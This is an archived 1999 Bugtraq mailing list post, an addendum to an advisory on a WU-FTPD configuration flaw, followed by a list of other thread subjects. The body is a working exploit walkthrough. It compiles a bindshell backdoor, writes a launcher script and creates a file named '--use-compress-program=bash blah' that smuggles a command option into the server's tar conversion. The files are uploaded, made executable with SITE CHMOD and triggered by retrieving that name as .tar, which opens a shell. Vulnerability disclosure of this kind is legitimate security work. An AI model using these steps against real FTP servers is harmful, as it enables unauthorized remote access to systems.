Bugtraq mailing list archives

More details on the WU-FTPD configuration vulnerability.

From: suid () SUID KG (suid)
Date: Tue, 21 Dec 1999 23:10:56 +1100

Good evening all,

I have noticed that in my original Bugtraq posting/paper I mentioned the
possibility of executing arbitrary code if you actually have a valid FTP
only account on a system, but did not include specific info on this.

I realise now that this information is more relevant than the anonymous
FTP exploit as it is the default configuration and many, many people give
users accounts on this kind of setup believing it to be `secure'.

Please find below an addendum to my paper (http://www.suid.kg/advisories/001.txt)

You can find this on the web with the rest of my stuff at the new location
http://www.suid.kg/ .

Merry Xmas,
suid () suid kg

---

suid () suid kg - an addendum to wu-ftpd configuration vulnerability exploit information

Background:

In the initial advisory I mentioned that users with valid ftp access only accounts may also
execute arbitrary code. I did not however include exploit information for this. This information is
now found below.

Exploit Information:

With a valid FTP account only the server, the difficulty goes right down. You also have the added
benefit of not being stuck in a chroot() environment at the end
(by default). Local exploit time.

The exploit goes along much the same lines as the anonymous FTP exploit does:

Create a backdoor, using bindshell from our previous example:

$ gcc bindshell.c -o b -static

If you can perform a SITE CHMOD (default for normal non-anon users on wu-ftpd), then you can
use the following script example. Create a script to exec the desired commands:

$ cat > blah
#!/bin/bash
./b &
^D

Now create empty file "--use-compress-program=bash blah"

$ > "--use-compress-program=bash blah"

FTP to your target, login with your username/password. Upload your 3 files:

ftp> put b
ftp> put blah
ftp> put "--use-compress-program=bash blah"

Do a SITE CHMOD for b and blah:

ftp> quote SITE CHMOD 0755 b
ftp> quote SITE CHMOD 0755 blah

Now get your file:

ftp> get "--use-compress-program=bash blah".tar

Thats all there is to it. You now should have a shell on whatever port you specified.

Merry Xmas!

Current thread:

Re: Announcement: Solaris loadable kernel module backdoor, (continued)
- - - Re: Announcement: Solaris loadable kernel module backdoor Steven Alexander (Dec 23)
    - Re: Announcement: Solaris loadable kernel module backdoor Rainer Link (Dec 22)
    - Re: Announcement: Solaris loadable kernel module backdoor Keith Owens (Dec 22)
    - Re: Groupewise Web Interface satherrl () MAILPOINT DSSRG CURTIN EDU AU (Dec 21)
    - Norton Email Protection Remote Overflow (Addendum) Matt Conover (Dec 20)
    - procmail / Sendmail - five bugs Michal Zalewski (Dec 23)
    - Re: procmail / Sendmail - five bugs Rob Jones (Dec 20)
    - Re: procmail / Sendmail - five bugs Michal Zalewski (Dec 22)
    - FTPPro insecuities The Wall (Dec 27)
    - serious Lotus Domino HTTP denial of service Alain Thivillon (Dec 21)
    - More details on the WU-FTPD configuration vulnerability. suid (Dec 21)
    - Microsoft Security Bulletin (MS99-058) Aleph One (Dec 21)
    - Microsoft Security Bulletin (MS99-061) Aleph One (Dec 21)
    - More Netscape Passwords Available. Rob Jones (Dec 21)
    - UnixWare i2odialogd remote root exploit Brock Tellier (Dec 21)
    - IE 5.01 vulnerabilities in external.NavigateAndFind() Georgi Guninski (Dec 22)
    - Solaris 2.7 dmispd local/remote problems Brock Tellier (Dec 22)
    - Multiple vulnerabilites in glFtpD (current versions) suid (Dec 22)
    - Re: Multiple vulnerabilites in glFtpD (current versions) Per Lejontand (Dec 23)
    - Re: Multiple vulnerabilites in glFtpD (current versions) The Tree of Life (Dec 23)
    - Re-release of Microsoft Security Bulletin MS99-046 Microsoft Product Security (Dec 23)

(Thread continues...)